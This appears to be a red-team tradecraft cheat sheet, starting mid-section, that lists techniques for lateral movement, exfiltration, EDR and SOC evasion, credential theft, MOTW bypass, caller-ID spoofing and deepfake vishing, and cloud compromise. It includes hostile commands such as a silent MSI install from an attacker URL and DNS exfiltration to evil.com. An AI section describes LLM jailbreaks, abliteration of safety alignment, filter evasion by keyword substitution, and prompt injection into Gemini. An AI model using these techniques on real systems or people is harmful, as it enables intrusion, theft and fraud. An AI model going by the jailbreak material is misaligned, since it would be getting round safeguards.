Pass-the-Hash (PtH): Use NT hash directly via NTLM — works with SMB, WMI, WinRM, RDP (Restricted Admin)
Pass-the-Ticket (PtT): Inject stolen Kerberos TGT/TGS — Rubeus ptt /ticket:base64
Overpass-the-Hash: Use NT hash to request a Kerberos TGT — avoids environments blocking NTLM
Pass-the-Certificate: Use stolen ADCS certificate for PKINIT — Certipy auth -pfx cert.pfx
Detection: Event 4624 Type 9 (PtH), 4768 with unusual encryption types (overpass)

LATERAL

SCShell & Fileless Service Execution

Lateral movement via service configuration changes — no new service, port 135 only

SCShell: Changes existing service's binary path → starts service → restores original path
No Event 7045: Modifies existing services — avoids #1 lateral movement detection
Port 135 only: Uses DCERPC/SVCCTL — does not require SMB (445)
Modified SCShell: Find stopped services with DLLs NOT in System32 → replace DLL + start service
Authentication: Supports pass-the-hash natively
OPSEC: Event 7040 (service config change) may fire — but far less monitored than 7045

LATERAL

Advanced DCOM Techniques

Novel DCOM methods for fileless lateral movement with reduced detection surface

Fileless DCOM: Forshaw research — fileless lateral movement with free PPL protection for beacons
GoExec DCOM htafile: Uses dcom/urlmon to load URL Moniker executing JScript — stealthiest with inline JScript
WMI Event Sub: Async WMI via Event Subscription to run DLL-hijackable binary — port 135 only, no 445
wmiexec-Pro: Port 135 only — no SMB required
Cross-Session Activation: DCOM-based cross-session activation for lateral movement + privilege escalation

LATERAL

C2 Pivoting (SMB / TCP)

Chain beacons through internal networks — only first hop needs internet access

SMB Named Pipe: Parent beacon communicates with child over SMB pipe — port 445
Architecture: Internet beacon (HTTPS) → SMB child → SMB grandchild → deep network
OPSEC: Only the first beacon touches the internet — internal traffic is SMB/TCP (normal)
Risk: If parent beacon dies, all children lose connectivity — set up redundant paths
Invoke-SMBRemoting: Interactive shell over Named Pipes — fileless SMB lateral movement

LATERALPRIVESC

Token Impersonation

Steal tokens from running processes to impersonate other users

Token impersonation: Duplicate access token from another process — requires SeImpersonatePrivilege
elevate_pid_bof: BOF that steals process token by PID — inline, no fork & run
incognito: Token enumeration and impersonation — list all available tokens
Potato family: SweetPotato / PrintSpoofer / GodPotato — escalate from service accounts to SYSTEM
OPSEC: Token theft is local — no network traffic, no new logon events

LATERAL

RDP & WinRM Advanced

Programmatic RDP and WinRM for lateral movement

SharpRDP: Send keystrokes programmatically over RDP — adjust for non-English keyboard layouts
HiddenDesktop: HVNC for Cobalt Strike — hidden virtual desktop for interactive access
evil-winrm: Full interactive PS session with upload/download/module loading
bof-winrm-client: WinRM client as Beacon Object File for inline execution
RDP relay: Impacket ntlmrelayx RDP relay server — relay RDP auth to SMB or HTTP

// Exfiltration & Data Staging

Getting data out without triggering DLP, proxy inspection, or network anomaly detection. Blend with normal traffic patterns.

EXFIL

HTTPS C2 Channel

Exfiltrate data through the existing C2 channel — simplest approach

Chunking: Large files split into small chunks matching normal C2 traffic size
Malleable profile: Data embedded in POST body, cookies, or URL parameters mimicking legitimate traffic
Timing: Match exfil rate to normal C2 callback interval — don't suddenly spike bandwidth
Limitation: Slow for large volumes — constrained by C2 sleep time and chunk size

EXFIL

DNS Exfiltration

Encode data in DNS queries — works even in heavily restricted networks

Concept: Encode data as subdomains — base64data.evil.com → DNS query to your NS
dnscat2: Full C2 over DNS — TXT, CNAME, MX, A records
iodine: IP-over-DNS tunnel — full network connectivity through DNS
DOH: DNS queries via HTTPS to Cloudflare/Google — encrypted, harder to inspect
Detection: Anomalous DNS query volume, long subdomain strings, unusual record types

EXFIL

Cloud Storage & Staging

Upload to legitimate cloud services — blends with normal SaaS traffic

OneDrive / SharePoint: Use victim's own M365 token — appears as normal usage
Azure Blob Storage: SAS token upload — looks like normal Azure API calls
OPSEC: Use the org's existing cloud provider — traffic to their own tenant is least suspicious
Compress: 7z, zip — reduces transfer size and obscures file types
Password-protected archives: 7z a -pPASSWORD -mhe=on archive.7z data/ (encrypts filenames too)
Naming: Rename archives to look benign (.log, .tmp, .bak)

// OPSEC Considerations

Operational security separates a noisy pentest from a realistic adversary simulation. Every action has a detection signature — know what you're generating.

🚨

The Big 5 that get operators caught: Default C2 profiles (JA3/JARM flagged), running Mimikatz directly, PsExec everywhere (service creation 7045), touching LSASS without evasion, and failing to clean up after objectives.

Detection Risk by Action

ACTION                           RISK LEVEL    DETECTION SOURCE
Phishing email sent              LOW           Email gateway, user reporting
HTML smuggling opened            LOW           Browser telemetry (limited)
Shellcode loader executed        MEDIUM        AV static scan, AMSI (if not bypassed)
C2 beacon callback              LOW-MED       Network IDS, JA3/JARM fingerprint
AMSI/ETW patch                  MEDIUM        EDR memory integrity checks
Process injection (cross-process) HIGH         Kernel callbacks, ETW, Sysmon 8/10
LSASS access                    VERY HIGH     ObRegisterCallbacks, Sysmon 10, EDR
Mimikatz execution              VERY HIGH     Static + behavioral + memory sigs
PsExec lateral movement         HIGH          Service creation 7045, named pipe, SMB write
WMI remote execution            MEDIUM        WMI-Activity log, Event 4648
DCOM execution                  LOW-MED       Process creation from DCOM host process
Scheduled task creation         MEDIUM        Event 4698, Sysmon
DCSync                          VERY HIGH     Event 4662, DRS replication from non-DC
Large data transfer             HIGH          DLP, NetFlow anomaly, proxy logs

OPSEC

MDI & Identity Detection Evasion

Bypass Microsoft Defender for Identity, CrowdStrike Identity, and identity-layer detections

ldapx: LDAP proxy that modifies queries in-transit — strip suspicious attributes before MDI sensors
MDI LDAP bypass: Use objectGUID=* filter + ReplaceTautologies to avoid MDI LDAP query signature
DCSync from DC account: Use the DC's own machine account — Elastic rules skip accounts ending in $
Certipy PKINIT evasion: Use Schannel authentication instead of PKINIT to avoid MDI detection
ADCS recon via ADWS: Use Active Directory Web Services instead of LDAP — different detection surface
SCCM tool OPSEC: sccmhunter uses Impacket backend — prefer LDAP queries or ldeep sccm module

OPSEC

Canary Token & Honeypot Detection

Detect traps before you trigger them — canary tokens, honey files, and ProjFS detection

IndicatorOfCanary: Detect canary tokens in documents, DNS, web before triggering alerts
ProjFS detection: Use PrjGetOnDiskFileState API to detect ProjFS-tracked directories used by Thinkst
AWS canary evasion: Thinkst canary tokens leak token ID in username — send fake events with spoofed IP
Cortex fake data: Hooks samcli.dll functions to return fabricated data — validate through alternative APIs
MDE emulator detection: Resolve MpSomeSandboxOnlyFunction to check for fake processes

OPSEC

Network OPSEC

C2 traffic, DNS, and network-level detection avoidance

JA3/JA3S fingerprinting: TLS client hello is unique — default CS has known JA3. Mitigate: nginx in front
Domain categorization: Uncategorized domains = suspicious — get categorized before use
User-Agent: Match the target org's browser/OS distribution — Chrome on Windows, not curl/python
Residential proxies: IPRoyal, SmartProxy, Decodo, BrightData for IP rotation
Traffic volume: Sudden spike in HTTPS to a new domain = network anomaly detection trigger

OPSEC

Staying Quiet

Principles for minimizing detection footprint throughout the engagement

Live off the land: Use legitimate tools already on the system when possible
Inline execution: Run BOFs/inline .NET instead of fork & run — no child processes
Minimize cross-process operations: Injection, handle access trigger kernel callbacks
Sleep long: 60s+ sleep with high jitter (50%+) — reduces beacon frequency
Work hours only: Operate during business hours to blend with normal admin activity
Vary IOCs: Different named pipes, URIs, user-agents per target host

// Privilege Escalation

From standard user to SYSTEM, Domain Admin, or cloud admin. Local privilege escalation is often the first step after initial access.

PRIVESC

Local Privilege Escalation

Standard user to SYSTEM — service misconfigurations, installer abuse, and unpatched vulnerabilities

WSUS LPE: HTTP WSUS server exploitation with delivery optimization bypass
CVE-2025-52915: Windows Update Stack privilege escalation — abuse update mechanism for SYSTEM
TrustedInstaller via DISM API: Elevate to TrustedInstaller — can stop PPL-protected EDR services
RAITrigger: WebDAV local SYSTEM authentication trigger for relaying to LDAP/SMB
EnableEFS: Enable EFS service as low-priv user for coercion attacks
Unquoted service paths: Classic — place binary in path gap of unquoted service executable paths

PRIVESCEVASION

BYOVD & Kernel Exploitation

Bring Your Own Vulnerable Driver to terminate EDR or gain kernel access

BYOVD concept: Load a signed but vulnerable kernel driver — exploit it to gain kernel-level access
Sunder / appid.sys: Vulnerable drivers for terminating EDR processes from kernel mode
Cortex blocks all loldrivers.io: Flags drivers by hash AND Authenticode signature — need unknown vulnerable drivers
EDR-Freeze: WerFaultSecure-based process suspension against EDR — works on Win11 Pro, fails Enterprise (PPL)
PPL exploitation: Protected Process Light prevents direct access — requires kernel-level exploit or TrustedInstaller

PRIVESCLATERAL

AD Privilege Escalation

Domain escalation via Kerberos relay, delegation abuse, and certificate exploitation

KrbRelayUp: Kerberos relay-based local privilege escalation — relay to gain SYSTEM
BadSuccessor (dMSA): Delegated Managed Service Account privesc on Windows Server 2025 — SharpSuccessor
NTLM Reflection (CVE-2025-33073): SMB to LDAPS relay even with LDAP signing AND channel binding enabled
RBCD: Still works after Shadow Credentials patch — set up delegation on computer objects you control
S4U2Self: Use machine NT hash for ticket impersonation — request ticket as any user to the machine

// Active Directory Attacks

ADCS exploitation, Kerberos attack chains, Shadow Credentials, and comprehensive AD enumeration. Active Directory remains the primary target in enterprise red team engagements.

CREDPRIVESC

ADCS Exploitation (ESC1–ESC15)

Active Directory Certificate Services — most prolific escalation path in modern AD environments

ESC1: Vulnerable template allows attacker to specify SAN — request cert as any user
ESC4 → ESC1 chain: Modify vulnerable template to enable ESC1 — propagation to CA can take up to 8 hours
ESC4 → Enrollment Agent: Alternative when ESC1 conversion fails due to DNS SAN requirements
Golden Cert: Forge any certificate with stolen CA private key — ultimate persistence
Certipy: All-in-one ADCS exploitation — find, exploit, and forge certificates
Stealthy ADCS recon: Query via ADWS instead of LDAP — avoids LDAP-based detection

CREDLATERAL

Kerberos & Delegation Attacks

Kerberoasting, Shadow Credentials, constrained/unconstrained delegation abuse, and ticket forging

Shadow Credentials: Jan 2026 patch broke self-write — bypass: set CustomKeyInformation flags to 0x02 (MFA_NOT_USED). keycred by RedTeam Pentesting
Kerberoasting evasion: Use --stealth flag in Impacket. Note: Microsoft killing RC4 in Kerberos by 2026 — impacts kerberoasting
Timeroasting: Attack based on Kerberos timestamp encryption — novel credential extraction
Unconstrained delegation: Monitor for TGTs with Rubeus monitor — capture and reuse
Constrained delegation: S4U2Proxy abuse to access services as any user

CRED

DCSync & NTDS Extraction

Extract domain credentials via replication protocol or direct NTDS.dit access

DCSync OPSEC: Use the machine account of a DC — Elastic rules skip $ accounts for Event 4662
DSInternals: DCSync from Windows — reportedly undetected by several EDRs. Available as BOF
ADCSSync: Alternative to DCSync — requests certificate per user from ADCS. Works against Cortex
ntdsutil.exe snapshot: Mount VSS snapshot and copy NTDS.dit — undetected by Cortex XDR
DPAPI domain backup key: DCSync retrieves key — decrypt any user's DPAPI-protected secrets

CRED

Token & Session Theft

Extract Azure AD tokens, Primary Refresh Tokens, and Windows token broker cache

Windows Token Broker Cache: NetExec wam module for extracting cached tokens
aadprt BOF: Acquire Primary Refresh Tokens (PRT) — PRTs have MFA + device claims
SeamlessPass: Convert Kerberos tickets to M365 access tokens via Seamless SSO
SignalKeyBOF / WhatsAppKeyBOF: Extract encryption keys from Signal/WhatsApp desktop
Passwordless ops: When users have no passwords (FIDO2/WHfB) — steal TGT from memory, extract PRT

CRED

vSphere Attack Operations

Leverage VMware vSphere access for credential extraction via snapshots and VMDK cloning

Snapshot method: Create VM snapshot → download .vmem + .vmsn → convert with vmss2core to .dmp → mount with MemProcFS
VMDK clone method: Clone VM → download VMDK → parse with Volumiser to extract SAM/SYSTEM/SECURITY
SharpSphere: Tool for vSphere interaction — VM operations, guest file interaction
VM must be running: .vmem files only exist when VM is powered on
Credential targets: Domain Controllers, Exchange servers, SCCM

AD

AD Enumeration & Tooling

Comprehensive AD enumeration with minimal detection footprint

BloodHound-CE: Custom queries at queries.specterops.io, cypherhound
ADExplorerSnapshot: Enhanced with technology detection — SCCM, ADFS, ADCS, LAPS, Exchange auto-detected
bloodyAD: LDAP operations with certificates, PTH to LDAP — SOCKS compatible
ShadowHound / SilentHound / BOFHound: Stealthy AD enumeration — significantly less noise than SharpHound
RelayInformer: Determine EPA enforcement levels on relay targets
Misconfiguration-Manager: Central knowledge base for SCCM tradecraft — all attack paths

// MOTW Bypass & Delivery Techniques

Mark-of-the-Web controls are the frontline defense against downloaded payloads. These techniques bypass MOTW tagging, SmartScreen checks, and container-based protections.

MOTW

MOTW Bypass Techniques

Bypass Mark-of-the-Web tagging to avoid SmartScreen and Protected View

Archive types preserving ADS: WinRAR (.rar) and 7zip WIM (.wim) format preserve ADS on extraction
RAR MOTW gaps: WinRAR tags LNKs but NOT: XLL, JS, URL, CLICKONCE, IQY, CPL, WSF, CHM
Polyglot LNK data: Data appended to LNKs or stored in ADS has no MOTW
WebDAV delivery: Files served via WebDAV may avoid download-based MOTW tagging
curl downloads: Files downloaded via curl.exe may lack MOTW in certain configurations
Trusted locations: Office XLSTART / template directories are trusted — no MOTW checks applied

MOTWACCESS

LNK-Based Delivery Chains

LNK files remain the most effective initial trigger — hard for Microsoft to kill

LNK chaining: Split complex commands across LNK₁ → LNK₂ → LNK₃ to stay under EDR thresholds
PATHEXT manipulation: SET PATHEXT=.PNG;%PATHEXT% → CMD treats PNG as executable
LNK + MSHTA polyglot: LNK simultaneously valid as HTA/VBS — mshta executes LNK directly
LNKSmuggler: Create .lnk files with embedded encoded data in ZIP archives
Keep LNK small: Under 1KB recommended — file-size-based EDR detections trigger on oversized LNKs

MOTWPAYLOAD

Polyglot & Exotic File Formats

Single files valid as multiple formats — confuse parsers and evade type-based detection

COPY /B polyglot: COPY /Y /B a.lnk2+b.vbs c.lnk — appends VBS/ZIP to LNK binary, LNK still functions
.winget files: Execute winget configure with YAML DSC — runs arbitrary PowerShell, no SmartScreen. Default on Win11
KiXtart (.kix/.spk): Ancient obscure scripting with COM automation, WMI, LDAP — zero detection
IExpress.exe: Built-in Windows tool creates self-extracting installers — resembles known-good carrier
Mitra: Binary polyglot generator for multi-format file creation
BAT/CMD with BOM: UTF-16 BOM prefix on ASCII batch — scanners see UTF-16LE, CMD executes as ASCII

MOTWEVASION

SmartScreen & SAC Bypass

Smart App Control and SmartScreen reputation bypass techniques

BAT/CMD search order hijack: Create 4-char BAT + hidden calc.bat — SAC allows BAT/CMD launched from CMD
Expired cert signing: SmartScreen treats binaries with any certificate as less suspicious
WorstFit: Hidden Windows ANSI character transformations — bypass Sigma rules, path traversals
MSC files (GrimResource): XSS in MMC console files — chain with MOTW bypass
Chocolatey abuse: choco pack + choco install --force — reflective DLL loader, no prompts

MOTWPAYLOAD

MSI / MST Weaponization

Abuse Windows Installer for code execution, lateral movement, and persistence

MSI initial access: Running DLLs via msiexec was undetected by CrowdStrike Falcon
MST transforms: msiexec /i legit.msi TRANSFORMS=evil.mst /qb — modify legitimate MSI behavior
MS-signed sideload: MSI installs MS-signed EXE vulnerable to DLL sideloading + malicious DLL + startup LNK
Remote MSI: msiexec /i http://attacker.com/payload.msi /q — silent install from URL
Greenshot deser: Legitimate app + crafted .greenshot file triggers .NET deserialization RCE

// Social Engineering & Vishing

Voice phishing, caller ID spoofing, deepfakes, and pastejacking. The human layer remains the weakest link — these techniques exploit trust, urgency, and helpfulness.

VISH

Caller ID Spoofing Infrastructure

Self-hosted PBX systems for caller ID spoofing — impersonate any phone number

Asterisk PBX: Self-hosted on Hetzner/AWS VPS — full control over outbound caller ID
StuntBanana: Minimalist Asterisk CID spoofer built for AWS deployment
3CX + Skyetel: Configure Skyetel creds + set outbound CID for spoofing. Requires driver's license (US)
Easybell (EU): Cloud PBX with CID spoofing configurable in web UI — use Zoiper as SIP client
AWS Connect: Only requires billing-configured account — simpler than Twilio
BluffMyCall: SaaS alternative ~$30/month for quick CID spoofing without infra setup

VISHAI

Voice Cloning & Real-Time Deepfake

Clone executive voices from public recordings — real-time voice conversion for live calls

ElevenLabs Multi-Language: Works great across languages — pair with Vapi.ai for real-time chat
w-okada voice-changer: Local real-time voice conversion — ~250ms delay. Route through Voicemeeter Potato
Training data: Find "fireside chats" or public recordings — edit ~30min down to ~10min of just target voice
Deep-Live-Cam: Real-time face swap with single image — 15+ FPS on modern GPU. Pipe through OBS into Teams/Zoom
Hedra: AI video creation for generating social engineering videos with fully faked characters

ClickFix / Pastejacking

Trick users into pasting malicious commands via fake CAPTCHAs and clipboard hijacking

Fake Cloudflare verification: Checkbox copies PowerShell to clipboard, prompts Win+R paste
Mechanism: document.execCommand("copy") fires on interaction — user pastes base64-decoded PS command
recaptcha-phish: Fake reCAPTCHA phishing page — same clipboard hijack technique
EXIF smuggling + ClickFix: Cache smuggling using EXIF data — payload hidden in image metadata
Effectiveness: Users trust CAPTCHA patterns instinctively — very high click-through rates

QR Code Phishing (Quishing)

QR codes that bypass email scanners — redirect to credential phishing or ClickFix pages

QRucible: Generates "imageless" QR codes using HTML/CSS/Unicode — evades image-based QR scanners
DocuSign + QR combo: DOCX with company logos + QR code — "scan before digital signature" pretext
USPS QR postcards: Print professional postcards with QR codes — deliver via postal mail. 30% hit rate
Mobile targeting: QR forces mobile browser where corporate EDR/proxy has limited coverage

PHISH

Trusted Platform Abuse

Abuse legitimate SaaS platforms to send phishing from trusted domains

DocuSign API: Customizable email templates — sends from trusted DocuSign domains
Zendesk/Freshdesk trial: Create targetname.zendesk.com → support articles with payloads
Canva websites: Quick landing page on company.my.canva.site — trusted domain
Website contact features: Abuse "contact user" / "share file" — sends from the company's own domain
LOTS Project: lots-project.com — comprehensive catalog of living-off-trusted-sites techniques

Pretext Library & Vishing Scenarios

Proven pretexts for phone-based social engineering and callback phishing

Mail bombing + Teams call: Flood inbox with signup emails → call as IT via Teams → QuickAssist remote control
Helpdesk attack (MGM-style): Target helpdesks — request password resets with OSINT data
Employee benefits: PerksAtWork/TicketsAtWork pretexts especially effective around new year
Developer targeting: Impersonate client developer with "compiler error" — ask to compile backdoored project
Device code via phone: "I need to verify your identity — I'm generating a unique code for you"
Pretext Project: pretext-project.github.io — open library of proven pretext ideas

// Cloud Attack Operations

Azure/Entra ID, AWS, and GCP attack techniques. Cloud environments have different attack surfaces, detection mechanisms, and persistence opportunities than traditional on-prem infrastructure.

CLOUD

Azure / Entra ID Initial Access

Password spraying, MFA fatigue, and token theft against Microsoft cloud identity

IP-rotated spraying: CredMaster with FireProx/AWS API Gateway for source IP rotation per request
Smart Lockout bypass: Residential proxy rotation targeting same region/city as target HQ
MFA phone fatigue: m365-fatigue — trigger alternative MFA (phone calls) until user accepts
UPN vs email mismatch: UPN may differ from email — TeamsEnum to pull real UPNs
o365spray / TrevorSpray / TeamFiltration: M365 enumeration + spraying tools

CLOUD

Conditional Access Policy Bypass

Circumvent Entra ID Conditional Access Policies for device compliance, MFA, and location

Client ID brute force: Try all possible client IDs to find one that passes CAP
Fake device compliance: Register device + talk to Intune via OMA Device Management sync protocol
PoCEntraDeviceComplianceBypass: Pure PowerShell PoC to bypass Entra/Intune Compliance CA Policy
CAP exclusion gaps: If policy requires MFA for "All resources" but excludes one, Microsoft auto-adds additional exclusions
TokenSmith: Bypassing Intune Compliant Device CA — generates compliant-appearing tokens

CLOUD

Cloud Post-Exploitation & Enumeration

Enumerate Entra ID, M365, SharePoint, and Azure resources after initial access

GraphSpy: Browser GUI for AAD/O365 — file search across SPO/OneDrive/Mail/Teams + passkey enrollment
ROADtools/ROADrecon: Uses legacy Azure AD Graph API which does NOT log read actions — stealthier
APEX: Azure Post Exploitation Framework — ROADrecon + GraphRunner + CA policy enumeration
Stealth: Legacy AAD Graph endpoint does not log reads — most orgs don't capture MicrosoftGraphActivityLogs
GraphPreConsentExplorer: First-party Entra clients with pre-consented Graph scopes

CLOUDPERSIST

Cloud Persistence Mechanisms

Maintain access after initial compromise — survives password changes and MFA resets

App Registration: Create application + client secret + API permissions — survives pw change + MFA reset
Passkey enrollment: Add passkey using only access token — counts as phishing-resistant MFA
Refresh token persistence: Captured refresh tokens survive password changes — refresh until revoked
AWS Role Juggling: AWSRoleJuggler — maintain persistent access by juggling between assumable IAM roles
GCP DWD abuse: DelePwn — exploit Domain-Wide Delegation misconfig to impersonate any GCP user

CLOUD

AWS Attack Operations

AWS-specific attack techniques from initial access to persistence and lateral movement

AWS SSO device code: aws sso login enables device code phishing — accesses ALL SSO accounts. No CA policy to block
GitHub Actions OIDC abuse: Compromise repo → exploit OIDC trust to access AWS — GuardDuty likely won't flag
Self-hosted runners theft: Copy runner directory to your server — invisibly become the pipeline runner
AWS-Key-Hunter: Real-time monitoring of GitHub for exposed valid AWS keys
Canary token evasion: Thinkst canary tokens leak token ID in username — send fake events with spoofed IP to confuse SOC

CLOUDLATERAL

On-Prem to Cloud Pivoting

Leverage on-premises AD compromise to gain access to Azure/Entra ID cloud resources

SeamlessSSO (DesktopSSO): Dump AZUREADSSOACC$ NT hash → forge Kerberos Silver Ticket → exchange for Azure access token
Flow: Silver Ticket → SOAP request to autologon.microsoftazuread-sso.com → DesktopSsoToken → SAML Assertion → tokens
SeamlessPass: Automated tool for leveraging Kerberos tickets for cloud access
PRT workflow: ROADrecon nonce → aadprt BOF for PRT-cookie → authenticate ROADrecon with msgraph
Internal recon targets: SharePoint, Confluence, internal Git, wikis — look for tokens, .env, Terraform configs

// Notable CVEs (2025)

Critical vulnerabilities from 2025 that enable initial access, lateral movement, or infrastructure compromise.

ACCESS

CVE-2025-5777 — Citrix Bleed 2

Session token leak via Citrix NetScaler — affects newer versions beyond original CitrixBleed

Impact: Unauthenticated attackers can extract valid session tokens from NetScaler memory
No credentials needed: Bypass authentication entirely by replaying stolen session tokens
Scope: Any internet-facing Citrix NetScaler Gateway or ADC running affected versions
Red team use: Initial access to corporate networks via Citrix without phishing or credential spraying

ACCESS

CVE-2025-1974 — IngressNightmare

Unauthenticated RCE in Kubernetes NGINX Ingress Controller — critical infrastructure compromise

No auth required: Exploitable without any credentials or prior access to the cluster
Blast radius: Ingress controllers see all cluster traffic — compromise enables secret theft, lateral movement, cluster takeover
Prevalence: NGINX Ingress is the most popular Kubernetes ingress controller — massive attack surface
Red team use: Direct path from internet to Kubernetes cluster compromise without phishing

ACCESS

CVE-2025-24016 — Wazuh Unsafe Deserialization

RCE in Wazuh SIEM via crafted serialized objects — compromise security monitoring infrastructure

Irony: Exploiting the SIEM gives attackers control over the very system designed to detect them
Post-exploitation: Disable alerts, modify rules, blind the SOC — then operate freely across the network
Attack path: Send crafted serialized objects to Wazuh API → achieve RCE on SIEM server
Red team use: Neutralize detection infrastructure early for unrestricted operations

// macOS & Linux Red Teaming

Cross-platform techniques for non-Windows environments. Linux boxes commonly lack EDR, and macOS has unique security boundaries (TCC, Gatekeeper) that require specific bypass knowledge.

MACOS

macOS Initial Access & Persistence

macOS-specific attack vectors, persistence mechanisms, and security bypass

Homebrew abuse: Similar to Chocolatey on Windows — create malicious packages for code execution
VS Code extension abuse: Exploit VS Code's bootstrapping to quietly load malicious plugins
Electron/Node.js stealers: Very low detection rates — hard to distinguish from legitimate apps at binary level
BLE C2 implant: Client/server using Bluetooth Low Energy — no complaints from TCC, Gatekeeper, or code signing
BLE password exfil: Exfiltrate passwords from fake macOS prompts over BLE to nearby laptop
pamspy: eBPF-based credential dumper — hooks PAM to capture sudo/su/ssh credentials

LINUX

Linux Post-Exploitation

Linux systems commonly lack EDR — outbound traffic is less anomalous than Windows

Linux beachheads: Linux systems often have missing EDR agents — ideal for initial beachhead
Kerberos on Linux: Tickets stored in /tmp/krb5cc_* or kernel keyring — steal for PtT attacks
pamspy: eBPF-based credential capture — hooks PAM for sudo/su/ssh without needing a PAM module
Container escapes: Docker socket access, privileged containers, host PID namespace abuse
LD_PRELOAD hijack: Set LD_PRELOAD to load malicious shared library before legitimate ones
Cross-platform C2: Sliver (Go), Mythic agents (Poseidon/Medusa) — native Linux support

MACOSLATERAL

VPN Client Exploitation

Abuse VPN clients for code execution and lateral movement on macOS and cross-platform

NachoVPN: Malicious SSL-VPN server exploiting VPN client configurations
Cisco AnyConnect: Executes VBS without prompting when connecting to malicious VPN server
GlobalProtect LPE: Local privilege escalation through GlobalProtect VPN client
Target selection: VPN admins/support staff are ideal targets — likely to test connection profiles
Does not work through ZScaler — direct VPN connection required

LINUXACCESS

Developer Targeting & Supply Chain

Target developers through malicious projects, packages, and IDE exploitation

Malicious .suo / EvilSln: Visual Studio project opening triggers code execution via .suo files
Backdoored compilation: Rust project executes payload during cargo build — target devs via "compiler error" pretext
GitHub typosquatting: Lookalike account + fork repos + backdoored release + GitHub project invitation emails
npmphish: Device code phishing for npmjs.com — capture sessions and backdoor packages
pip/npm supply chain: Backdoored packages targeting internal caches (Artifactory)

// AI-Assisted Operations

LLM jailbreaking, AI-driven C2, autonomous agents, deepfake generation, and AI-assisted code development. The intersection of AI and offensive security is rapidly expanding the operator's toolkit.

AI

LLM Jailbreaking & Uncensoring

Bypass LLM safety alignment to generate offensive content — from prompt tricks to model surgery

Crescendo: Multi-turn jailbreak using smart many-shot prompts to gradually coerce restricted conversations
L1B3RT4S: Collection of LLM jailbreak/liberation prompts for various models
Abliteration: FailSpy/abliterator removes safety alignment from LLMs — create LoRA from diff, apply to other models
Keyword substitution: Replace flagged words ("spoof" → "normalization") to bypass content filters
Local uncensored: Run llama2-uncensored via Ollama — no guardrails, full offensive capability
Red Team Arena (redarena.ai): Platform for practicing LLM jailbreak techniques

AIC2

AI-Driven C2 & Autonomous Agents

LLM-powered command and control — non-deterministic code generation defenders can't signature

AI C2 architecture: Human query → LLM generates Python/Lua code → feed into C2 agent loader — code unknown to defenders
Claude-C2: Uses MCP (Model Context Protocol) server for C2 communication
Drone: NLP for on-host actions — "scan the local subnet for machines with RDP open"
Mythic MCP: Claude Sonnet driving Mythic C2 (Apollo agent) via MCP protocol
LitterBox MCP: Iteratively test payloads against detection, edit and recompile until bypassing Defender
Nerve: Create LLM agents via YAML tasklets — autonomous vulnerability discovery

AI

AI for Phishing & Social Engineering

AI-generated landing pages, foreign language phishing, and realistic visual content

SitesGPT: AI website builder producing realistic sites with non-obvious AI images
Cursor/Windsurf/Bolt: AI-powered editors for creating phishing landing pages with self-decrypting capabilities
Foreign language phishing: LLMs apply idioms, dialects, and specific wording far better than Google Translate
Gmail Gemini injection: Embed invisible white text attack prompt — Gemini "Summarize" outputs malicious link
Computer-Using Agents: OpenAI Operator and similar automate identity attacks at scale with no-code

AI

AI for Code Development & Malware

Using LLMs to write, debug, obfuscate, and iterate on offensive tooling

Cursor + Claude 3.5: Best combination for initial payload skeletons — Claude understands x64dbg screenshots
Deepseek-r1: Poor at code generation but excellent at debugging and fixing issues
Grok 3: No content restrictions observed for EDR unhooking discussions
RamiGPT: Autonomous privilege escalation using OpenAI — feeds system info, gets escalation paths
Local stack: Ollama (backend) + OpenWebUI (GUI with RAG) + Continue.Dev (VS Code Copilot replacement)

AI

AI for Reverse Engineering

LLM-assisted binary analysis, deobfuscation, and attack path discovery

GhidraMCP: MCP Server for Ghidra — AI-assisted reverse engineering and binary analysis
IDA Pro MCP: MCP Server for IDA Pro. Caution: some IDA MCP servers can be tricked into executing code from samples
BloodHound-MCP: MCP integration for AI-assisted AD attack path analysis and discovery
F5 WAF deobfuscation: Pipe obfuscated F5 ASM JavaScript into GPT/Claude for instant deobfuscation
Dyana: Sandbox for profiling ML models, ELFs, Pickle files, JavaScript for vulnerability analysis

// OSINT & Reconnaissance

Open-source intelligence gathering and external reconnaissance. Map the target's attack surface before engagement — cloud assets, email addresses, breach data, and exposed services.

CLOUD

Cloud & Workspace Recon

Enumerate Microsoft 365, AWS, and other cloud services for attack surface mapping

Awseye: Unauthenticated AWS account enumeration and enrichment
MSFTRecon: Microsoft 365 reconnaissance — enumerate tenant information, domains, and services
ATEAM: NetSPI AWS enumeration — discover and map AWS resources from external perspective
Porch-Pirate: Postman workspace credential harvesting from public collections
Data types: API keys, OAuth tokens, database credentials, service account passwords

LATERAL

Breach Intelligence & Email Harvesting

Leverage breach databases for credential discovery and password pattern analysis

Hudson Rock: Breach intelligence platform — compromised credentials and infostealer data
White Intel: Incident response intelligence — breach data correlated with target organizations
Password patterns: Analyze breached passwords from target org to build targeted wordlists
HunterScrape: Email harvesting from Hunter.io — extract corporate email addresses at scale
Prospeo: B2B email finder — discover professional email addresses for targeted phishing

INFRA

Distributed & Application Scanning

Cloud-based distributed reconnaissance at scale

Axiom: Cloud-based distributed recon — spin up fleet of scanning instances. Works with nmap, ffuf, nuclei
Moodle-Scanner: LuemmelSec's Moodle vulnerability scanner with self-updating via file hash cross-checks
udpz: SOCKS proxy-compatible UDP service scanner — scan UDP services through C2 SOCKS tunnels
UDP services: DNS, SNMP, NTP, TFTP — often unmonitored and misconfigured on internal networks

AD

Stealthy AD Enumeration

Active Directory enumeration tools that minimize detection footprint

ShadowHound: PowerShell-based AD enumeration — no binary on disk, runs entirely in memory
SilentHound: Stealthy LDAP enumeration — minimal queries, low-noise AD data collection
BOFHound: BloodHound data collection via Beacon Object Files — inline execution, no fork & run
Adalanche: ACL visualization and analysis — identify attack paths through AD permission chains
OPSEC advantage: These tools generate significantly less noise than SharpHound/bloodhound-python

// Password Cracking Infrastructure

Distributed cracking rigs, cloud GPU rental, wordlist generation, and rule development. Efficient password cracking is a force multiplier for every credential harvested during an engagement.

CRED

Distributed Cracking Platforms

Scale password cracking across multiple nodes — serverless, on-prem, and GPU-accelerated

NPK: Serverless cracking platform — Terraform/Ansible deployment on AWS with auto-scaling GPU instances
Hashtopolis: On-prem distributed agent-based cracking — split work across multiple machines
hashcat: GPU-accelerated core cracking engine — supports 300+ hash types, rules, masks, and hybrid attacks

CREDCLOUD

Cloud GPU Rental

Rent GPU compute for cracking sessions — cost-effective alternative to building dedicated hardware

vast.ai: Cheapest GPU compute marketplace — rent consumer and datacenter GPUs on demand
RunPod: GPU instances optimized for ML workloads — easily repurposed for hashcat
SaladCloud: Distributed GPU network — leverage idle consumer GPUs for cracking
